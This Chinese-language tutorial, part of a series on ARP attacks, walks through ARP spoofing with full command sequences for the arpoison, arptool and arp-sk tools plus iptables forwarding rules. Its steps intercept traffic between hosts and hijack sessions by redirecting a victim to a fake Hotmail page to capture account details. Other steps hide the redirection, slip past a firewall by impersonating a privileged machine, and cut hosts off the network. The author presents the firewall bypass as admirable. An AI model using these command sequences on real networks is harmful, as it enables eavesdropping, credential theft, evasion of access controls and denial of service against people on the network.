戰(zhàn)術(shù)攻防之近距離搏擊篇(ARP)攻擊(3)

雖然MAC泛洪的攻擊方式帶了一些恐慌，但是由于這種方式在很多場合成功概率不高，且這種攻擊方式太過于激進，以至于聰明的網(wǎng)管能很快分析網(wǎng)絡并馬上制止這種行為的擴散，因此一種稱之為ARP欺騙的隱蔽的ARP中毒演變攻擊進入了Cyber空間。

首先假設一個場景：假如主機A要想獲得主機B的MAC，它需發(fā)送arp-request數(shù)據(jù)包到廣播地址，主機B會以自身地址回應這個請求。但假如主機C在主機B之前作出回應。主機A則在其緩存中設置主機C的MAC地址。

12:50:31.198300 arp who-has hostB tell hostA   [1]

12:50:31.198631 arp reply hostC is-at 4e:73:02:4b:3f:94  [2]

于是我們構(gòu)造了欺騙行為，但由于主機A發(fā)送的是廣播包，因此主機B也會應答：

12:50:31.198862 arp reply hostB is-at 4e:80:51:d1:5e:f5  [3]

那么主機A的ARP緩存很有可能被刷新，但是由于緩存的無驗證即時更新機制，只要主機C不斷發(fā)送偽造的回應包，那么主機A的緩存列表中就能一直保存主機C的MAC地址。(假如主機不發(fā)送arp-request，向其發(fā)送arp-reply并無太大意思，因為緩存不會更新一個不存在的記錄)。其實現(xiàn)原理如圖：

了解ARP欺騙的方式后，其準確定義如下：利用以太和IP協(xié)議之間的交互關(guān)系而形成的攻擊方法，比如，偽造目標計算機的MAC地址以獲取其控制權(quán)。其表現(xiàn)形式為構(gòu)造虛假arp-request和arp-reply數(shù)據(jù)包以實現(xiàn)欺騙目的。

這種欺騙方式主要用于交換網(wǎng)絡結(jié)構(gòu)(對于HUB結(jié)構(gòu)，可以直接對目標主機進行強制控制，使用欺騙方式似乎是種累贅),因此交換網(wǎng)的堅固性似乎變的脆弱很多。

使用arpoison小程序可以發(fā)送自定義硬件和IP地址的arp-reply包給目標主機，對其實行欺騙行為。

[root@hackersvr arpoison]# ./arpoison –I eth0 –d {hostA_ipaddr} –s {hostB_ipaddr} –t 00:13:0E:19:85:03 –r {hostC_mac_addr}ARP packet sent via eth0

# 1、主機C大量使用自己MAC回應主機A的請求，導致主機A被蒙騙與主機進行通信。

# 2、假如{- r}參數(shù)所設置的MAC為一個不存在的MAC地址，則會導致主機B與主機C之間的TCP

# 會話臨時性強行斷開。

# 3、假如想更新網(wǎng)絡中所有主機系統(tǒng)，可以發(fā)送廣播MAC地址FF:FF:FF:FF:FF:FF

◆中間人攻擊(Man In the Middle，MIM)

在ARP方式的攻擊，最有意思的環(huán)節(jié)莫過于MIM，這種非常隱蔽方式可以在兩臺通信的計算機之間進行橋接方式的監(jiān)聽，并且非常不容易被發(fā)現(xiàn)，可謂是偷盜學術(shù)上的典范運用。

攻擊者駁接本地網(wǎng)絡，分別向主機A和主機B發(fā)送適當?shù)膫卧霢rp-reply包，蒙蔽其所認為的正確的通信目標，并建立轉(zhuǎn)發(fā)規(guī)則，實現(xiàn)主機A與主機B之間的數(shù)據(jù)通信。使數(shù)據(jù)鏈路表面上看似A與B的正常通信，實則通過了攻擊者的機器進行代理轉(zhuǎn)發(fā)。

采用arptool可以輕松實現(xiàn)這類入侵方式：

arptool用法: arptool

用于發(fā)送數(shù)據(jù)包的網(wǎng)卡

發(fā)送的ARP類型包

tell    arp-reply類型數(shù)據(jù)包

bcast   當攻擊對象是linux操作系統(tǒng)，可使用此參數(shù)代替tell

/        目標IP/MAC地址對

/        源IP/MAC地址對

1、分別對主機A/B實施ARP攻擊

[root@hackersvr arptool]#ping 192.168.1.1
[root@hackersvr arptool]#ping 192.168.1.2
[root@hackersvr arptool]#arp –a
?(192.168.1.1) at 01.01.01.01.01.01 [ether] on eth0
?(192.168.1.2) at 02.02.02.02.02.02 [ether] on eth0
[root@hackersvr arptool]# ./arptool eth0 tell 192.168.1.1 01:01:01:01:01:01 192.168.1.2 03:03:03:03:03:03
[root@hackersvr arptool]#./arptool eth0 tell 192.168.1.2 02:02:02:02:02:02 192.168.1.1 03:03:03:03:03:03

現(xiàn)在我們可以透明代理主機A/B之間的應用程序數(shù)據(jù)通信?，比如攻擊者可以修改主機A/B之間的HTTP事務提交，但這需要我們在其間建立橋接轉(zhuǎn)發(fā)關(guān)系。

2、橋接主機A/B之間通信

[root@hackersvr arptool]＃e cho 1 > /proc/sys/net/ipv4/ip_forward
[root@hackersvr arptool]#iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2
-d 192.168.1.1 --dport 80 -j REDIRECT --to-port 80

通過這種方式，我們可以監(jiān)聽、修改、切斷和劫持主機A/B之間的任何應用通信數(shù)據(jù)，似乎整個網(wǎng)絡陷落在一種前所未有的慌亂之中。

◆知識組合攻擊

arp-sk在arp方式攻擊中，享有“瑞士軍刀”的美譽，它可以維護所有設備的ARP表。通過發(fā)送適合的ARP數(shù)據(jù)包，它可以實現(xiàn)ARP的所有類型攻擊，非常強悍的工具。本節(jié)將采用arp-sk講解會話劫持、偷越防火墻和拒絕服務攻擊的思維方式。

1、 代理會話劫持(hijacking)

攻擊者架設HTTP服務器模擬遠程網(wǎng)站的一部分站點(這部分網(wǎng)頁用于劫持主機B客戶輸入相關(guān)信息，例如用戶名或ID)。而不需要模擬的站點則代理轉(zhuǎn)發(fā)至真實站點，這種高超的詐騙技巧非常 隱蔽。當我們盡情享受網(wǎng)絡沖浪的愉快時，誰會想到這是個陷阱？

發(fā)送arp-reply分別攻擊防火墻和目標主機

[root@hackersvr arp-sk]# ./arp-sk -r -d 192.168.1.2 -S 192.168.1.4 -D 192.168.1.2
+ Running mode "reply"
+ IfName: eth0
+ Source MAC: 03:03:03:03:03:03
+ Source ARP MAC: 03:03:03:03:03:03
+ Source ARP IP : 192.168.1.4 (gateway)
+ Target MAC: 02:02:02:02:02:02
+ Target ARP MAC: 02:02:02:02:02:02
+ Target ARP IP : 192.168.1.2 (hostB)
[...]
[root@hackersvr arp-sk]# ./arp-sk -r -d 192.168.1.4 -S 192.168.1.2 -D 192.168.1.4
+ Running mode "reply"
+ IfName: eth0
+ Source MAC: 03:03:03:03:03:03
+ Source ARP MAC: 03:03:03:03:03:03
+ Source ARP IP : 192.168.1.4 (hostB)
+ Target MAC: 04:04:04:04:04:04
+ Target ARP MAC: 04:04:04:04:04:04
+ Target ARP IP : 192.168.1.4 (gateway)
[...]
# 代理轉(zhuǎn)發(fā)非hotmail(207.68.171.233)的一切站點(攻擊者模擬hotmail站點，偽裝提供服務)
[root@hackersvr arp-sk]# iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2 \
-d !207.68.171.233 --dport 80 -j REDIRECT --to-port 80

代理轉(zhuǎn)發(fā)非hotmail(207.68.171.233)的一切站點(攻擊者模擬hotmail站點，偽裝提供服務)

[root@hackersvr arp-sk]# iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2 \
-d !207.68.171.233 --dport 80 -j REDIRECT --to-port 80

當使用轉(zhuǎn)發(fā)設置，目標主機使用ping命令可以檢測到其數(shù)據(jù)包的重定向，因此這里阻擋icmp重 定向的信息。

[root@hackersvr arp-sk]# echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects

OK，剩下的事情就是如何如何使用嗅探工具、數(shù)據(jù)捕獲工具或自行定義的腳本來觀測目標主機的# 沖浪行為，并可以掌握他所有一切上網(wǎng)信息，諸如：郵件帳戶、論壇ID等。(這些使用方法超出

本文所論述的arp攻擊行為，不予討論)

2、 偷越防火墻

網(wǎng)絡權(quán)利的不均衡總?cè)囚[一些自負的家伙。由于網(wǎng)管的存在和防火墻的規(guī)則的設置，使得某些具有特權(quán)的計算機才能任意的訪問整個互連網(wǎng)，這為其它機器的使用者潛埋下嫉妒和羨慕的心理成分。為了反擊這種權(quán)利不均衡，Arp方式的欺騙訪問再一次獲得成功！?

原理圖六中，虛線代表主機B的正常出網(wǎng)訪問，通過Arp攻擊后，攻擊者以主機B的身份特權(quán)對互連網(wǎng)進行任意訪問，并分離主機B的網(wǎng)絡訪問，使主機B網(wǎng)絡訪問正常無異，防火墻的訪問限

制形如虛設。

只需要對防火墻進行攻擊，不需要對主機B實施攻擊

[root@hackersvr arp-sk]# arp-sk -r -d 192.168.1.4 -S 192.168.1.2 -D 192.168.1.4

使用Linux的Netfilter框架，很容易分離屬于攻擊者網(wǎng)絡訪問流和屬于主機B的網(wǎng)絡訪問流

[root@hackersvr arp-sk]# iptables -t nat -A POSTROUTING -j SNAT --to 192.168.1.2

一切的完美幾乎就在幾句簡單的語句之間完成，我想起史蒂文?列維的幾句真言：

1、進入（訪問）計算機應該是不受限制的和絕對的；

2、一切信息都應該是免費的；

3、懷疑權(quán)威，反對壟斷；

4、任何一個人都能在計算機上創(chuàng)造藝術(shù)和美；

5、計算機能夠使生活變得更美好

于是，攻擊在此刻似乎也變的美麗了許多。

3、 拒絕服務攻擊(DoS)

有了上面學習過程，這里實現(xiàn)Dos攻擊的方式變的相當簡單，對于攻擊者所代理轉(zhuǎn)發(fā)的數(shù)據(jù)包進行阻塞，從而達到這種卑劣的目的。(我相當反感這種攻擊方式，因此我也非常討厭駕御它進行攻擊的人，因此我希望這類攻擊方式只用于實驗目的，不要濫用！)

利用Linux得力的iptables工具，方便實現(xiàn)數(shù)據(jù)堵塞

[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.1 -j DROP
[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.2 -j DROP
[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.4 -j DROP

另一種方式是制造一個Mac”黑洞”，既使用不存在的mac地址使目標主機從網(wǎng)絡地圖上消失。

如下句法使hostA認為hostB已經(jīng)離開網(wǎng)絡了：

[root@hackersvr arp-sk]# arp-sk -r -d hostB -S hostA --rand-arp-hwa-src -D hostB

通過了解Arp原理，我們發(fā)現(xiàn)這些攻擊方式非常有趣，并且思路簡單，實現(xiàn)方法也相當容易。但這些小技巧不過是Arp攻擊的基礎層面，下面的部分將深入討論一些Arp高級利用技巧，其攻擊思維的精妙之處令我贊嘆不止。

服務器租用/服務器托管中國五強！虛擬主機域名注冊頂級提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]